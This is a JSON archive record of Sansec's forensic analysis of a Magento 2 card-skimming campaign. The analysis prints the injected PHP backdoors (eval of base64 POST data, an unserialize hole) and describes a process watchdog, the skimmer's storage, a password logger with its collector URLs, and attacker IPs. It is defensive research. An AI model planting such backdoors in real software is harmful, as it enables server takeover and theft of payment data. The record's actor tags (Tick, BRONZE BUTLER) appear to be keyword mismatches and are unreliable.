{
	"id": "8c7a128a-bd0e-4568-90d1-e88eb3b446fa",
	"created_at": "2026-04-06T01:32:26.75229Z",
	"updated_at": "2026-04-10T13:11:51.378658Z",
	"deleted_at": null,
	"sha1_hash": "9029dc135c03bbdf18067d08d11a1fe234fd0c69",
	"title": "Hackers exploit security flaw right before Black Friday",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 614071,
	"plain_text": "Hackers exploit security flaw right before Black Friday\r\nBy Sansec Forensics Team\r\nPublished: 2020-12-02 · Archived: 2026-04-06 00:21:21 UTC\r\nThe affected stores were all running the older Magento 2.2, which is unsupported since December 2019.\r\nIn addition to the injected flaw, attackers used a hybrid skimming architecture, with front and back end malware\r\nworking in tandem. The added obfuscation \u0026 safeguarding measures make this the most complex skimming\r\noperation Sansec has identified this year.\r\nThanks to @RicTempesta, @giacmir and @vdloo_ for additional analysis.\r\nA persistent parasite\r\nEver bitten by a tick? Just removing the body will not prevent a nasty infection. As is the case with this campaign,\r\nwhere attackers injected multiple safeguarding mechanisms to secure their operations. The attack is extremely\r\ndifficult to get rid of, and most compromised merchants will see a reinfection within days after a cleanup.\r\nThis sophisticated attack consists of 4 components:\r\n1. a subtle POI security flaw functioning as a backdoor\r\n2. a backdoor watchdog in the form of a hidden system process\r\n3. a CORS-defeating hybrid payment (Magecart) skimmer, using frontend and backend components, with a\r\ndiscreet PII-retrieval feature\r\n4. an admin password logger with remote exfiltration\r\nThe backdoor allows the attacker to inject future, more advanced code into the site. The watchdog ensures\r\nrecovery of the backdoor, should somebody remove it. And the admin password logger, well, logs passwords just\r\nin case.\r\nWe will describe each component here. Sansec has found all attacks to be hand-crafted for individual stores, so the\r\nmalware on your store may vary slightly.\r\nAre you affected? Our eComscan scanner detects all of the varieties that we have investigated so far.\r\nPart A: The Product Compare Backdoor\r\nSansec found two distinct backdoors added to the Product Compare functionality of Magento 2. 
Both are activated\r\nby sending a specially crafted POST to /catalog/product_compare/ . The first one is trivial and easily\r\ndetectable. If the product key matches, it will run the given products as executable code:\r\n// generated/code/Magento/Catalog/Controller/Product/Compare/Index/Interceptor.php\r\n$productContents = $this-\u003egetRequest()-\u003egetParam('product_contents');\r\nhttps://sansec.io/research/magento-2-persistent-parasite\r\nPage 1 of 7\n\n$productKey = $this-\u003egetRequest()-\u003egetParam('product_key');\r\nif($productContents != \"\" \u0026\u0026\r\n $productKey == \"ceedf557f7e6acb1f0025c07df235c555e2d9d808e7f6e6e64825a3d5bb2ee6d\") {\r\n $productValues = base64_decode($productContents);\r\n eval ($productValues);\r\n}\r\nThe second one is much more subtle, because it injects the PHP unserialize function. This feature is officially\r\ndeprecated, because it allows PHP Object Injection (POI) attacks. Previously, Sansec published dozens of POI\r\nattacks in eCommerce extensions. The use of unserialize may look benign to the casual observer, while it actually\r\nhands full control to anyone knocking on its door (with a properly crafted PHP object).\r\nAlso, the irony of a PHP Object Injection injection is not lost on us.\r\n// generated/code/Magento/Catalog/Controller/Product/Compare/Index/Interceptor.php\r\n$productContents = $this-\u003egetRequest()-\u003egetParam('product_contents');\r\nif($productContents != \"\") {\r\n $pluginData = new \\Zend\\Serializer\\Adapter\\PhpCode;\r\n $data = '\"plugInfo\";' . base64_decode($productContents);\r\n $pluginData-\u003eunserialize($data);\r\n}\r\nNB when this backdoor is used, it will trigger a warning in your logs (more info):\r\nWarning: Uses eval() The PhpCode adapter utilizes eval() to unserialize. This introduces both a performance and\r\nThe Zend\\Serializer\\Adapter\\PhpCode adapter generates a parsable PHP code representation using var_export(). 
To\r\nA similar but slightly different backdoor was found to be injected into app/autoload.php :\r\n$productKey = \"\";\r\nif (isset($_POST['product_key']))\r\n $productKey = $_POST['product_key'];\r\nif (isset($_POST['VENDOR_NEW_PATH_MAGE']) \u0026\u0026\r\n ($productKey != \"PRODUCT_KEY\") ) {\r\n $vendor_path = $_POST['VENDOR_NEW_PATH_MAGE'] ;\r\n $pr_func = \"base\". \"64_de\".\"code\";\r\n $path_data = $pr_func($vendor_path);\r\n eval ($path_data);\r\n}\r\nPart B: The Backdoor Watchdog\r\nAttackers may have started one or more background processes on your server that will monitor the presence of the\r\nmalware. Should the backdoor in Product Compare be removed, the original backdoor will get reinstalled.\r\nMeanwhile, the timestamps of all your files are reset, so that the odd timestamp will not cause any suspicion.\r\nThe backdoor watchdog is a compiled C process that is started from /pub/media . The process may have multiple\r\nnames that mimic legitimate system processes, such as:\r\ndnsadmin dormant\r\nsshd [net]\r\nphp-fpm: pool www\r\nThe actual executable is deleted from /pub/media but can be inspected via /proc/\u003cpid\u003e/exe . The watchdog\r\ncontains a hard copy of the actual backdoor (which can be inspected with strings /proc/\u003cpid\u003e/exe ). After\r\nreinjecting the backdoor, the watchdog will run find generated/ -type f -name \"*.php\" -exec touch {} to\r\nreset the timestamps.\r\nAdditionally, the watchdog process listens on TCP port 9000. We haven't investigated further, but it is likely\r\nanother out-of-band channel to receive commands from the malware owner.\r\nPro tip: quickly find any of these backdoor watchdogs by running:\r\nsudo grep -l Magento.Catalog /proc/*/exe\r\nPart C: The Magecart Payment Stealer\r\nThe skimmer is added to require.js or another static JS file on disk. 
It may show a fake payment form\r\n(customized for the specific shop) but in all cases, sends all of the intercepted data to /checkout . This is almost\r\nidentical to a normal transaction flow, so security monitoring systems will not raise any flags.\r\nThen on the server side, a payload handler is added to vendor/magento/module-customer/Model/Session.php . It\r\ncollects the payment data and saves it to a discreet location for later retrieval (such as\r\npub/media/tmp/design/file/default_luma_logo.jpg or pub/media/tmp/.gitignore ):\r\nThe stored credit card data is not retrieved directly, but via a generic POST (in most cases to / ). Here, the\r\nattacker first retrieves the stolen data (5628 bytes) and then truncates the temporary data storage.\r\n193.160.32.219 - \"POST / HTTP/1.0\" 200 5628 \"\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537\r\n193.160.32.219 - \"POST / HTTP/1.1\" 200 5611 \"\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.\r\n193.160.32.219 - \"POST / HTTP/1.0\" 200 20 \"\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36\r\n193.160.32.219 - \"POST / HTTP/1.1\" 200 25 \"\" \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36\r\nPart D: The Admin Password Logger\r\nWhile all these lines of defense look fairly impenetrable, the attackers added yet another safeguard. 
Should all of\r\ntheir access get revoked, they would still receive live copies of staff passwords, delivered to one of these collector\r\nURLs:\r\nhttps://www.wheelsonheels.co.uk/pub/health_check.php\r\nhttps://www.ledpro.com/pub/health_check.php\r\nhttps://zago-store.vn/pub/health_check.php\r\nRelevant code:\r\nBecause the password logger is initially added to vendor/magento/module-backend/Model/Auth.php , it will\r\nautomatically end up in generated/code/Magento/Backend/Model/Auth/Proxy.php every time the Magento 2\r\ncode is regenerated.\r\nAnother interesting bit is the presence of a getCredentialStorageChiper function. It would have looked like a\r\nbenign function, if only the author hadn't made the mistake of writing Chiper instead of Cipher .\r\nLuke reported one of these password loggers on Twitter last week.\r\nRoot cause analysis\r\nAll investigated targets were running Magento 2.2.3 up to 2.2.7. While it is widely used, the 2.2 branch is\r\nofficially deprecated and all stores are urged to upgrade to Magento 2.3 or 2.4.\r\nIn order to gain access to these stores in the first place, the attackers exploited multiple security issues that were\r\npatched in Magento versions 2.1.17, 2.2.8 and 2.3.1.\r\n1. Retrieve hidden admin panel URL via information disclosure issue.\r\n2. Intercept logged-in administrator session key via SQL injection.\r\n3. Log in on the admin panel and create a temporary email template, which can be exploited to run uploaded\r\nPHP code.\r\n4. Add backdoor\r\n5. ....possibly a long idle period\r\n6. Add skimmer\r\n7. 
Periodically retrieve intercepted payment data via POST to /\r\nAn observed attack chain:\r\nAttribution\r\nSansec observed the following IPs that either injected malware or retrieved intercepted data:\r\n104.129.16.8\r\n104.168.14.206\r\n107.172.97.122\r\n155.94.198.5\r\n167.88.61.117\r\n167.88.61.176\r\n167.88.61.176\r\n185.152.67.39\r\n185.154.13.210\r\n193.160.32.219\r\n198.255.66.27\r\n2.58.45.2\r\n50.7.159.34\r\n66.154.104.2\r\n66.154.105.2\r\n66.212.20.8\r\n67.88.61.176\r\n87.166.53.100\r\n96.44.161.8\r\nRecommendations\r\nSansec recommends all affected merchants to engage a forensic investigation and cleanup. We have provided a\r\nchecklist for your convenience. Our flagship software eComscan will help your team right now with the\r\ninvestigation, and will also help to prevent future incidents.\r\nHeader image by Erik Karits\r\nSource: https://sansec.io/research/magento-2-persistent-parasite",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://sansec.io/research/magento-2-persistent-parasite"
	],
	"report_names": [
		"magento-2-persistent-parasite"
	],
	"threat_actors": [
		{
			"id": "5a0483f5-09b3-4673-bb5a-56d41eaf91ed",
			"created_at": "2023-01-06T13:46:38.814104Z",
			"updated_at": "2026-04-10T02:00:03.110104Z",
			"deleted_at": null,
			"main_name": "MageCart",
			"aliases": [],
			"source_name": "MISPGALAXY:MageCart",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf",
			"created_at": "2023-01-06T13:46:38.626906Z",
			"updated_at": "2026-04-10T02:00:03.043681Z",
			"deleted_at": null,
			"main_name": "Tick",
			"aliases": [
				"G0060",
				"Stalker Taurus",
				"PLA Unit 61419",
				"Swirl Typhoon",
				"Nian",
				"BRONZE BUTLER",
				"REDBALDKNIGHT",
				"STALKER PANDA"
			],
			"source_name": "MISPGALAXY:Tick",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "54e55585-1025-49d2-9de8-90fc7a631f45",
			"created_at": "2025-08-07T02:03:24.563488Z",
			"updated_at": "2026-04-10T02:00:03.715427Z",
			"deleted_at": null,
			"main_name": "BRONZE BUTLER",
			"aliases": [
				"CTG-2006 ",
				"Daserf",
				"Stalker Panda ",
				"Swirl Typhoon ",
				"Tick "
			],
			"source_name": "Secureworks:BRONZE BUTLER",
			"tools": [
				"ABK",
				"BBK",
				"Casper",
				"DGet",
				"Daserf",
				"Datper",
				"Ghostdown",
				"Gofarer",
				"MSGet",
				"Mimikatz",
				"Netboy",
				"RarStar",
				"Screen Capture Tool",
				"ShadowPad",
				"ShadowPy",
				"T-SMB",
				"down_new",
				"gsecdump"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b",
			"created_at": "2022-10-25T16:07:23.419513Z",
			"updated_at": "2026-04-10T02:00:04.591062Z",
			"deleted_at": null,
			"main_name": "Bronze Butler",
			"aliases": [
				"Bronze Butler",
				"CTG-2006",
				"G0060",
				"Operation ENDTRADE",
				"RedBaldNight",
				"Stalker Panda",
				"Stalker Taurus",
				"Swirl Typhoon",
				"TEMP.Tick",
				"Tick"
			],
			"source_name": "ETDA:Bronze Butler",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"9002 RAT",
				"AngryRebel",
				"Blogspot",
				"Daserf",
				"Datper",
				"Elirks",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HOMEUNIX",
				"HidraQ",
				"HomamDownloader",
				"Homux",
				"Hydraq",
				"Lilith",
				"Lilith RAT",
				"McRAT",
				"MdmBot",
				"Mimikatz",
				"Minzen",
				"Moudour",
				"Muirim",
				"Mydoor",
				"Nioupale",
				"PCRat",
				"POISONPLUG.SHADOW",
				"Roarur",
				"RoyalRoad",
				"ShadowPad Winnti",
				"ShadowWali",
				"ShadowWalker",
				"SymonLoader",
				"WCE",
				"Wali",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"XShellGhost",
				"XXMM",
				"gsecdump",
				"rarstar"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775439146,
	"ts_updated_at": 1775826711,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9029dc135c03bbdf18067d08d11a1fe234fd0c69.pdf",
		"text": "https://archive.orkl.eu/9029dc135c03bbdf18067d08d11a1fe234fd0c69.txt",
		"img": "https://archive.orkl.eu/9029dc135c03bbdf18067d08d11a1fe234fd0c69.jpg"
	}
}